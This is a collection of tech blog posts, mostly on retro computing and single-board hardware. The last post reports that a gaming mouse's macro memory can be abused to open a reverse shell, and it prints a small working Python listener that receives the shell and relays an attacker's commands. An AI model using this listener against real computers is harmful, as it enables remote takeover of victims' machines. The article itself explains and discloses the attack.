Atari Archaeology Without Digging Up Landfill Sites

We are fortunate to live in an age of commoditized high-power computer hardware and driver abstraction, in which most up-to-date computers can handle more or less any task that has to keep pace with a human's attention without breaking a sweat. Processors are very fast, memory is plentiful, and 3D graphics acceleration is both speedy and ubiquitous.

Thirty years ago it was a different matter on the desktop. Even the fastest processors of the day would struggle to perform on their own all the tasks demanded of them by a 1980s teenager who had gained a taste for arcade games. The manufacturers rose to this challenge by surrounding whichever CPU they had chosen with custom co-processors: ASICs that took on the heavy lifting of 2D graphics acceleration, or of audio and music synthesis.

One of the 1980s objects of computing desire was the Atari ST, featuring a Motorola 68000 processor, a then-astounding 512 kB of RAM, a GUI OS, colour graphics, and 3.5″ floppy drive storage. Had you opened up the case of your ST, you'd have found those ASICs we mentioned, responsible for its impressive spec.

Jumping forward three decades, [Christian Zietz] found that there was frustratingly little information on the internal workings of the ST's ASICs. Since a trove of backed-up data had become available when Atari closed down, he thought it would be worth digging through it to see what he could find. His write-up is a story of detective work in ancient OS and backup software archaeology, and it paid off: he found schematics not only for an ASIC from an unreleased Atari product but also for the early ST ASICs he was looking for. There are hundreds of pages of schematics and timing diagrams, which will surely take the efforts of many Atari enthusiasts to fully understand, and best of all he thinks there are more waiting to be unlocked.

We’ve covered a lot of Atari stories over the years, though many of them have related to the company's other products, such as the iconic 2600 console. We have brought you news of an open-source ST on an FPGA though, and more recently the restoration of an ST that had had a hard life. The title of this piece refers to the fate of Atari's huge unsold stock of 2600 cartridges, a marketing failure so disastrous that the excess was taken to a New Mexico landfill site in 1983 and buried. We reported on the 2013 exhumation of these video gaming relics.

A tip of the hat to Hacker News for bringing this to our attention.

Atari ST image, Bill Bertram (CC-BY-2.5) via Wikimedia Commons.

Colossus: Face To Face With The First Electronic Computer

When the story of an invention is repeated as Received Opinion for the younger generation, it is so often presented as a single one-off event with a named inventor. Before the event there was no invention, then as if by magic it was there. That apple falling on Isaac Newton's head, or Archimedes overflowing his bath: you've heard the stories. The inventor's name will sometimes differ depending on which country you are in when you hear the story, which provides an insight into the flaws in these simple invention tales. The truth is that in so many cases an invention does not have a single Eureka moment; instead the named inventor builds on the work of the many others who have gone before, and is the lucky engineer or scientist whose ideas result in the magic breakthrough before anyone else's.

The history of computing is no exception, with many steps along the path that has given us the devices we rely on for so much today. Blaise Pascal’s 17th century French mechanical calculator, Charles Babbage and Ada, Countess Lovelace’s work in 19th century Britain, Herman Hollerith’s American tabulators at the end of that century, or Konrad Zuse’s work in prewar Germany represent just a few of them.

So if we are to search for an inventor in this field we have to be a little more specific than “Who invented the first computer?”, because there are so many candidates. If we restrict the question to “Who invented the first programmable electronic digital computer?” we have a much simpler answer, because we have ample evidence of the machine in question. The Received Opinion answer is therefore “The first programmable electronic digital computer was Colossus, invented at Bletchley Park in World War Two by Alan Turing to break the Nazi Enigma codes, and it was kept secret until the 1970s”.

It’s such a temptingly perfect soundbite, laden with pluck and derring-do that could so easily be taken from a 1950s Eagle comic, isn't it? Unfortunately it contains such significant untruths as to be rendered useless. Colossus is the computer you are looking for, and it was developed in World War Two and kept secret for many years afterwards, but the rest of the Received Opinion answer is false. It wasn't invented at Bletchley, its job was not the Enigma work, and most surprisingly, Alan Turing's direct involvement was only peripheral. The real story is much more interesting.

Continue reading “Colossus: Face To Face With The First Electronic Computer”

A PDP-11 On A Chip

If you entered the world of professional computing sometime in the 1960s or 1970s, there is a high probability that you would have found yourself working on a minicomputer. These were a class of computer smaller than the colossal mainframes of the day, with a price tag that put them within the reach of medium-sized companies and institutions rather than only large corporations or government-funded entities. Physically they were not small machines, but compared to the mainframes they did not require a special building to house them or a high-power electrical supply.

A PDP-11 at The National Museum Of Computing, Bletchley, UK.

One of the most prominent among the suppliers of minicomputers was Digital Equipment Corporation, otherwise known as DEC. Their PDP line of machines dominated the market and can be found in the ancestry of many of the things we take for granted today. The first UNIX development in 1969, for instance, was performed on a DEC PDP-7.

DEC’s flagship product line of the 1970s was the 16-bit PDP-11 series, launched in 1970 and continuing in production until sometime in the late 1990s. Huge numbers of these machines were sold, and it is likely that nearly every adult reading this has at some time or other encountered one at work, even if unaware that the supermarket till receipt, invoice, or doctor's appointment slip in their hand was processed on one.

Over that more-than-20-year lifespan, of course, DEC did not retain the discrete 74-series logic architecture of the earliest models. Successive PDP-11 generations featured ever greater integration of the processor, culminating by the 1980s in the J-11, a CMOS microprocessor implementation of the PDP-11/70. This took the form of two integrated circuits mounted on a large 60-pin ceramic DIP carrier. It was one of these devices that came the way of [bhilpert], and instead of retaining it as a curio he decided to see if he could make it work.

The PDP-11 processors had a useful feature: a debugging console built into their hardware. This means it should be a relatively simple task to bring up a processor like the J-11 without the rest of a PDP-11 around it, and that is exactly what he set about doing. A 6402 UART at the address expected of the console, a little 74-series glue logic, an address latch, and a couple of 6264 8K×8 RAM chips gave him a very simple but functional PDP-11 on a breadboard. He found it would run with a clock speed as high as 11 MHz but baulked at a 14 MHz crystal, something he suggests the breadboard layout may be responsible for. Hand-keying a couple of test programs through the console, he was able to demonstrate it working.
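If you've not met it before, that built-in console (DEC's ODT, for Octal Debugging Technique) speaks a terse serial protocol: '/' opens a memory location and echoes its contents, typing a new octal value followed by carriage return deposits it, and 'G' starts execution. Purely as a hedged illustration of the idea, and not code from [bhilpert]'s write-up, a session like his hand-keyed tests could be driven from a modern host with a few lines of Python and pyserial, assuming a hypothetical /dev/ttyUSB0 adapter wired to the 6402 UART:

```python
import serial  # pyserial

PORT = "/dev/ttyUSB0"  # hypothetical USB-serial adapter on the 6402 UART

with serial.Serial(PORT, 9600, timeout=2) as ser:
    ser.write(b"\r")  # wake ODT; it should answer with its '@' prompt
    # Deposit a two-word test "program": 000240 (NOP) at octal 1000 and
    # 000000 (HALT) at 1002, then start it. It executes the NOP and halts
    # straight back into ODT, proving the processor fetches from our RAM.
    for cmd in (b"1000/", b"240\r", b"1002/", b"0\r", b"1000G"):
        ser.write(cmd)
        print(ser.read(256).decode("ascii", "replace"), end="")
```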

We’ve seen a lot of the PDP-11 on these pages over the years. Of note are a restoration of a PDP-11/04, this faithful reproduction of a PDP-11 panel emulated with the help of a Raspberry Pi, and an entire PDP-11 emulated on an AVR microcontroller. We have indeed come a long way.

Thanks [BigEd] for the tip.

[Ken Shirriff] Demystifies BeagleBone I/O

If you have ever spent a while delving into the bare metal of talking to the I/O pins on a contemporary microprocessor or microcontroller, you will know that it is not an exercise for the faint-hearted. A host of different functions can be multiplexed behind a single physical pin, and once you are looking at the hardware through the cloak of an operating system your careful timing can be derailed in an instant. For these reasons most of us take advantage of other people's work and use the abstraction provided by a library or a virtual filesystem path.

If you have ever been curious enough to peer under the hood of your board's I/O, then you may be interested in [Ken Shirriff]'s latest blog post, in which he explores the software stack behind the pins on a BeagleBone Black. Though its specifics are those of one device, the points it makes are relevant to many other similar boards.

He first takes a look at the simplest way to access a BeagleBone's I/O lines, through virtual filesystem paths. He then explains why relying so heavily on the operating system in this way causes significant timing issues, and goes on to explore the physical registers that lie behind the pins. Finally he discusses the multiplexing of different pin functions before explaining the role of the Linux device tree in keeping the operating system in touch with the hardware.
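To make the contrast concrete, here is a hedged sketch of the two approaches; neither is code from [Ken]'s post. The first toggles a pin through the sysfs virtual filesystem, assuming GPIO 60 (GPIO1_28, header pin P9_12 on the BeagleBone Black) and a kernel that still exposes /sys/class/gpio. Every edge is a full open/write/close round trip through the kernel, which is where the latency and jitter come from:

```python
import time

GPIO = "60"  # GPIO1_28, header pin P9_12 on the BeagleBone Black

# Ask the kernel to expose the pin (fails harmlessly if already exported)
try:
    with open("/sys/class/gpio/export", "w") as f:
        f.write(GPIO)
except OSError:
    pass

with open(f"/sys/class/gpio/gpio{GPIO}/direction", "w") as f:
    f.write("out")

value = f"/sys/class/gpio/gpio{GPIO}/value"
for _ in range(5):
    # Each edge is a separate trip through the VFS layer, so timing is
    # at the mercy of the scheduler rather than the hardware.
    with open(value, "w") as f:
        f.write("1")
    time.sleep(0.5)
    with open(value, "w") as f:
        f.write("0")
    time.sleep(0.5)
```

The register-level alternative maps the AM335x GPIO1 module out of /dev/mem and writes its set/clear registers directly, so each edge costs a single bus write. The base address and offsets below are as given in TI's AM335x reference manual, but treat this as an illustrative sketch rather than production code, not least because it needs root and bypasses the kernel entirely:

```python
import mmap
import os
import struct

GPIO1_BASE  = 0x4804C000   # AM335x GPIO1 module base (TI TRM)
GPIO_OE     = 0x134        # output-enable register (0 bit = output)
GPIO_CLROUT = 0x190        # write 1s here to drive pins low
GPIO_SETOUT = 0x194        # write 1s here to drive pins high
PIN         = 1 << 28      # GPIO1_28, the same P9_12 pin as above

fd = os.open("/dev/mem", os.O_RDWR | os.O_SYNC)
regs = mmap.mmap(fd, 0x1000, offset=GPIO1_BASE)

def read32(off):
    return struct.unpack_from("<I", regs, off)[0]

def write32(off, val):
    struct.pack_into("<I", regs, off, val)

write32(GPIO_OE, read32(GPIO_OE) & ~PIN)  # make the pin an output
write32(GPIO_SETOUT, PIN)                 # pin high: one bus write
write32(GPIO_CLROUT, PIN)                 # pin low: one bus write
```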

For some Hackaday readers this will all be old news, but it’s safe to say that many users of boards like the BeagleBone Black will never have taken a look beyond the safely abstracted ways to use the I/O pins. This piece should therefore provide an interesting education to the chip-hardware novice, and should probably still contain a few nuggets for more advanced users.

We’ve seen a lot of [Ken]’s work here at Hackaday over the years, mostly in the field of reverse engineering. A few picks are his explanation of the TL431 voltage reference, a complete examination of the 741 op-amp, and his reverse engineering of the 1970s Sinclair Scientific calculator.

We appreciate [Fustini]’s tip on this story.

BeagleBone Black image: BeagleBoard.org Foundation [CC BY-SA 3.0], via Wikimedia Commons.

Intel Releases The Tiny Joule Compute Module

At the keynote for the Intel Developer Forum, Intel CEO Brian Krzanich introduced the Intel Joule compute module, a ‘maker board’ targeted at Internet of Things developers. The high-end board in the lineup features a quad-core Intel Atom running at 2.4 GHz, 4GB of LPDDR4 RAM, 16GB of eMMC, 802.11ac, Bluetooth 4.1, USB 3.1, CSI and DSI interfaces, and multiple GPIO, I2C, and UART ports. According to the keynote, the Joule module will be useful for drones and robotics, and with support for Intel’s RealSense technology it may find a use in VR and AR applications. The relevant specs can be found on the Intel News Fact Sheet (PDF).

This is not Intel’s first offering aimed at the Internet of Things. A few years ago, Intel partnered up with Arduino (the Massimo one) to produce the Intel Galileo. This board featured the Intel Quark SoC, a 400 MHz, 32-bit processor with the Pentium ISA. It was x86 in an Arduino format. It was quickly followed by the Intel Edison, which paired an Atom with a Quark coprocessor, and then by the Intel Curie, found in the Arduino 101 and this year’s DEF CON badge.

We’ve seen plenty of Intel’s ‘maker’ and Internet of Things offerings, but we haven’t seen these platforms succeed. You could spend hundreds of thousands of dollars in market research to determine why these platforms haven’t seen much success, but the Hackaday comments will tell you the same thing for free: the documentation for these platforms is sparse, and nobody knows how to make these boards work.

Perhaps because of those earlier failures, the Joule differs significantly from previous offerings. Although it can easily be compared with the Raspberry Pi, BeagleBone, and a hundred other tiny single board computers, the official literature for the Joule invites a comparison with the Nvidia Jetson instead. The Jetson is a high-power, credit card-sized ‘supercomputer’ meant as a building block for high-performance applications such as drones and anything else that requires video processing or a very fast processor. The Joule fits into this market splendidly, with demonstrated applications including augmented reality safety glasses for Airbus employees and highway patrol motorcycle helmet displays. Here, the Joule might just find a market. This might even be its main focus: it can be integrated onto Gumstix carrier boards, providing a custom single board computer with configurable displays, connectors, and sensors.

The Intel Joule lineup consists of the Joule 570x and 550x, the 550x being a little slower, with a gigabyte less RAM and half as much storage. They will be available in Q4 2016 from Mouser, Newegg, and other Intel reseller partners.

Nuka-Cola PC Case Really Glows

It’s hard to imagine a video game series with more potential for cool prop projects than Fallout. The series has a beautiful and unique art style that is chock-full of potential for real-world builds. Pip-Boys, Fat Mans, and power armor projects abound. But most of these projects are purely aesthetic: something to stick on a shelf and show off to your fellow geeks.

[themitch22] wanted something he could actually use, and what does a geek use more than their computer? Thus, he set out to create a Fallout-themed PC case, and a Nuka-Cola vending machine was the perfect choice for inspiration.

The attention to detail on the build is astounding, with a functional display (powered by a Raspberry Pi), glowing Nuka-Cola Quantum bottles, and weathering to make it feel like it has survived a nuclear apocalypse. He was also kind enough to post pictures of the entire process, which show how all of the parts were 3D-printed and assembled.

Need some more Fallout goodness to inspire your next build? Check out this amazing Pip-Boy replica we featured last year.

[thanks to Nils Hitze for the tip]

Unexpected Betrayal From Your Right Hand Mouse

Some people really enjoy the kind of computer mouse that would not be entirely out of place in an F-16 cockpit. The kind of mouse that can launch a browser when one of its thirty-eight buttons is nudged ever so slightly to the left, and open the garage door when that same button is nudged to the right. But can this power be used for evil, and not just for frustrating guest users of the computer?

We’ve heard of trusted peripherals being repurposed for nefarious uses before, and sometimes they’ve even been modified for more benign purposes. All of these hacks share a common thread: the mouse itself had to be physically modified to add the vulnerability or feature. Advanced mice with macro support, however, can be used as-is for a vulnerability.

The example in this case is a Logitech G-series gaming mouse. The mouse has the ability to store multiple personal settings in its onboard memory, so that someone can take it to multiple computers and still have all their settings available. [Stefan Keisse] discovered that the 100-command limit on the macro for each button is more than enough to get a full reverse shell on the target computer.
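To see why a mere keystroke macro is enough, consider what sits on the attacker's side: nothing more exotic than a waiting TCP listener. The macro only has to 'type' a short connect-back command on the victim machine, and everything afterwards travels over the resulting socket. Here's a hedged, minimal Python sketch of such a listener, not taken from [Stefan]'s write-up and with a hypothetical port number:

```python
import socket

LISTEN_PORT = 4444  # hypothetical port the sabotaged macro connects back to

srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srv.bind(("0.0.0.0", LISTEN_PORT))
srv.listen(1)
conn, addr = srv.accept()            # blocks until the macro fires
print(f"connection from {addr}")
while True:
    cmd = input("$ ") + "\n"         # command typed by the attacker
    conn.sendall(cmd.encode())       # forwarded to the shell on the victim
    print(conn.recv(65536).decode(), end="")
```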

Considering how frustratingly easy it is to accidentally press an auxiliary button on one of these mice, all an attacker would need to do after delivering the sabotaged mouse is wait. Video of the exploit after the break.

Continue reading “Unexpected Betrayal From Your Right Hand Mouse”